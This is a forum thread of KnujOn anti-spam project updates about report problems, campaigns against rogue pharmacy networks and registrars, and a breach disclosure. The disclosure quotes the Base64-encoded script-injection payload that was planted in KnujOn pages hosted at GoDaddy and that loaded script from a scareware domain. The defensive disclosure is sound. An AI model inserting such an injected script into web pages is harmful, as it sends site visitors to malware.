InBoxRevenge KS Forum

Hello,

Happy New Year and thank you for your participation

We realize that some of you are having problems with your reports or are generally dissatisfied with the quality of the reports. We are doing the best we can to resolve these issues but there are some details everyone should know, especially newer members. The KnujOn process was not initially designed to be a client-oriented project. The client reports were retro-fitted on the existing process at the request of our earliest members and have new features added on in an ad-hoc fashion. We truly understand the importance of community involvement and we strive to champion and empower the regular Internet user. To this end we will continue rebuild the client interface as well as our core process to serve you better. The website and other critical pieces are also being redesigned.

The other areas of our work a progressing in major, not yet seen ways. We are spearheading a push against illicit online pharmacy that is changing the way the illegal networks operate and limiting their access to U.S.-based resources they have been using without interruption for many years. This article:
http://www.circleid.com/posts/20100104_ ... _property/
has become a lightning rod and is under attack from the very ISPs profiting from spam and online abuse. Their panic shows we can win this fight.

Check out Brian Krebs at: krebsonsecurity.com

***************************************************
In order to serve our clients better and troubleshoot processing we have added a submission receipt page to the reports. This simple report will indicate the files received and the success or failure of data extraction. This will ensure that what you believe you sent is what we received and processed. This receipt will only be for submissions going forwarded.

Knujon news: http://www.knujon.com/news.html
Knujon Discussion Group at LinkedIn:
http://www.linkedin.com/groups?gid=1870205
KnujOn Blog: http://www.circleid.com/members/3296/
Twitter: @ KnujOn

Knujon forum at inboxrevenge.com:
viewtopic.php?f=9&t=1666

KnujOn is an all volunteer, un-funded initiative. Our responsibilities have grown exponentially in the last year and our pay is still zero. We are committed to this solution and appreciate your patience while we work our way through the maze of Internet bureaucracy to reduce illicit traffic and spam.

Thank you for your continued support!

Recently, we got into a spat with a Registrar over an unlicensed pharmacy domain that was impersonating a pharmaceutical manufacture. The Registrar brushed off our concern until we made clear that their position was completely indefensible. They finally suspended the domain after the brief discussion

We want to be clear about issues with the KnujOn reports. There is a problem
with the machine our database sits on. Unfortunately, there is no help desk
to call when these things happen, we are the help desk. Our limited staff
and resources throw us into a bind if serious technical problems occur.
However, this is also an opportunity to reevaluate our process. We have
learned many things in the last few years and the early KnujOn model needs
to be redesigned to suit our changed understanding. We have, in fact,
reached many of the original goals of KnujOn, but now we need to take it to
the next level.

In terms of your experience, we will completely purge and recreate the
client reports, carefully observing the process as the reports are written.
The process for generating reports will be examined step by step. Please
bear with us.

>From the global project perspective, we are working effectively to dismantle
all the major illicit pharmacy networks, one-by-one. This has taken up a
considerable amount of our time, but would not have happened without your
participation.

We realize that some of you are having problems with your reports or a re
generally dissatisfied with the quality of the reports. We are doing the
best we can to resolve these issues but there are some details everyone
should know, especially newer members. The KnujOn process was not initially
designed to be a client-oriented project. The client reports were
retro-fitted on the existing process at the request of our earliest members
and have new features added on in an ad-hoc fashion. We truly understand the
importance of community involvement and we strive to champion and empower
the regular Internet user. To this end we will continue rebuild the client
interface as well as our core process to serve you better. The website and
other critical pieces are also being redesigned.

The other areas of our work a progressing in major, not yet seen ways. We
are spearheading a push against illicit online pharmacy that is changing the
way the illegal networks operate and limiting their access to U.S.-based
resources they have been using without interruption for many years. This
article:
http://www.circleid.com/posts/20100104_ ... _property/
has become a lightning rod and is under attack
from the very ISPs profiting from spam and online abuse. Their panic shows
we can win this fight.

Hello,

We apologize for not sending out regular notices for a while, but we did not
feel it prudent since the report interface has stalled. You may have noticed
that your report was gone before today. We purged all the exiting reports
and re-populated them to clean house and start fresh. We are monitoring the
creation of reports. Unfortunately, while all client reports have been
republished, not all reports are current. We have had some major systems
failures and strange network behavior. We ordered a memory upgrade that took
longer than expected. However, we are back into the swing of things and
addressing all problems. It may take us a while to return to regular report
updates but that is our goal.

Three main problems: 1. Not all samples are getting to knujon, 2. Not all
data is being extracted from processed samples, 3. Not all knujon members
are getting action or satisfaction. We are working to correct this. To
start, in your receipt page each file we processed from you is listed. If a
file you sent or uploaded is not present, we did not get it. The receipt
will also indicate whether or not we were able to extract data. Sometimes we
get files from members we cannot read. Sometimes we receive samples from
clients that are empty and this is also indicated. Samples that do not
produce results are now being diverted for further analysis. If there is no
receipt page we have not processed anything from you recently, but this may
be because we have not gotten to it yet.

We have some members who submit thousands of samples and some who only
submit a few. In response we were trying to create a report interface that
would meet the needs of people with different volumes, trying to make the
shoe fit all feet. This has not worked so we are redesigning the reports to
match the individual submission volume and return information that is more
interesting and actionable. Some of our members are happy to just report
junk mail and forget about it, others like to review and use the reports.
For the later we will make the reports more interactive and offer
opportunities to participate in KnujOn enforcement actions.

On other fronts, were a spearheading a massive effort against rogue
Registrars and illicit online networks called The Internet Doomsday Book, to
be officially announced this week at the MIT Spam Conference
(http://projects.csail.mit.edu/spamconf/) and published at the ICANN meeting
in June (http://brussels38.icann.org/). Details about the Doomsday Book will
be published on KnujOn along with opportunities to participate in its
development and sign-on as a supporter.

We also will soon be announcing a major victory over one of the largest
illicit pharmacy networks in the world. Stay tuned!

Hello,

We are waiting on the arrival of some new equipment and a larger bandwidth
to so we can re-commit ourselves to the client experience of this project.

While we are waiting, the reports are being overhauled and unused and
redundant sections will be removed. In the near future we will provide
details and a preview and instructions. The updated report interface will
feed directly into a powerful backend process designed to change Internet
accountability.

Our official response to the recent ICANN WHOIS study can be found here:
http://forum.icann.org/lists/whois-accu ... 00008.html. This
response follows our announcement of the KnujOn Internet Doomsday Book
Project, a bold effort to examine the uncountable and undocumented Internet
architecture. Participation in the Doomsday Book is open to the public, but
KnujOn members will have a built-in function for participating. Details of
our progress will be posted on the site.

Hello,

Yes, we have been out of touch for a while, but not without good reason. In
conjunction with LegitScript.com we have dismantled the bulk of the largest
illicit online pharmacy network, the so-called EvaPharmacy (full report
here: http://legitscript.com/download/Rogues- ... Report.pdf).
This the culmination of over a year of work that KnujOn members contributed
to. Thousands of sites removed, an Internet criminal enterprise hobbled. Pat
yourself on the back.

More information:
http://www.darkreading.com/securityserv ... ticle.jhtm
l?articleID=224700688
http://www.buysafedrugs.info/News/Docum ... ntID=25793
http://news.hostexploit.com/cybercrime- ... gs-a-their
-killer-online-pharmacies.html

However, our work is not yet done. A handful of Registrars, most prominently
eNom and Moniker, have refused to comply and continue to support the
criminal network by sponsoring their domains. This has culminated in a
contractual compliance crisis at ICANN. On December 23, 2008 the National
Boards of Pharmacy issued a letter to eNom(care of Sarah Akhtar Cooper)
expressing concern over their continued sponsorship of illegal online
pharmacies. A copy of the letter may be found at
http://www.legitscript.com/download/NAB ... o-eNom.pdf. Subsequently,
it was confirmed with the Pharmacy Boards of Manitoba, Minnesota, Ontario,
Quebec, and Texas that the “pharmacy licenses” posted by the eNom-sponsored
domains were forgeries. It is important to understand that local pharmacy
boards are the primary regulatory bodies in this area. Notices of the
forgeries were also sent to eNom. eNom received a request to terminate 3000
unlicensed pharmacy domains on December 1, 2009. eNom is in grave violation
of Registrar Accreditation Agreement Section 3.7.2: "Registrar shall abide
by applicable laws and governmental regulations."

This information was disseminated to the industry and public in what has
become the most read and most discussed CricleID posting, "When Registrars
Look the Other Way, Drug-Dealers Get Paid"
(http://www.circleid.com/posts/20100504_ ... ther_way_d
rug_dealers_get_paid/). We have received considerable backlash for this
article, even directly from a Registrar.



In one final note, a statement drafted by KnujOn regarding WHOIS
inaccuracies was submitted to the ICANN board and staff by the At-Large
Advisory Committee(ALAC).
http://gnso.icann.org/node/12361
https://st.icann.org/gnso-liaison/index ... nt_whois_r
eports

I wonder why they have pulled that full report out of circulation?

From: Michail Egorov [mailto:[email protected]]
Sent: Wednesday, June 09, 2010 1:40 AM
Subject: [regtime #225681] Removal request: 32432dsfds.ru

According to rules of .RU domains registration, we can only suspend such domains on the basis of the effective judgment by the court of law
--
Regards, Michail Egorov,
Webnames.Ru technical support

I do not understand. Why do some registrars in Russia put illegal sites on client hold when we request it, without any court order, but your company refuses?

Please get legal advice from your lawyers.

A refusal to cancel service contracts when they are obviously illegal can result in prosecution for assisting in a crime. This is the same in Russia as it is in other countries.

The incorrect response that you need a court order has been discussed in public at a report published recently

See the report at http://www.legitscript.com/blog/120

I again ask that your company takes a firm position against abuse of your service contracts from criminals.

All registrars present their Terms of Service on their web site. These terms give the registrar the right to terminate the service contract when the domain is used for unlawful purposes, with no reference to a court order. The judgment that a domain is used for illegal purposes is made by the registrar. The research has already been performed. You can find it in the links to the wikipedia at
http://spamtrackers.eu/wiki/index.php/C ... known_Spam

Thank you for your understanding

Thanks for letting us know. This was a technical glitch on our end. The report should now be available. Thanks again.

GoDaddy hit with intrusion, including KnujOn.com

In the interests of full disclosure, GoDaddy web servers were hit with a PHP injection that added code to some KnujOn pages. The additional code forwarded the user's browser to a site that attempts to download malicious software and display a "scareware" site selling fake anti-virus software. KnujOn techs immediately located the infected page and disabled it. We analyzed the code and it. The encrypted insertion tries to load this string of Base64:

"PHNjcmlwdCBzcmM9Imh0dHA6Ly9jbG91ZGlzdGhlYmVzdG5vdy5jb20va3AucGhwIj48L3NjcmlwdD4"

Which decoded is: cloudisthebestnow[DOT]com

We have filed complaints against this site, which is sponsored by the problem Registrar BIZCN, and their NameServer, OKLAHOMACITYCOM.COM.

Special thanks to the member who noticed it early. No official word from GoDaddy yet. No KnujOn client information is stored online.

More information:
http://blog.sucuri.net/2010/06/godaddy- ... stnow.html
http://www.knujon.com/news.html#06092010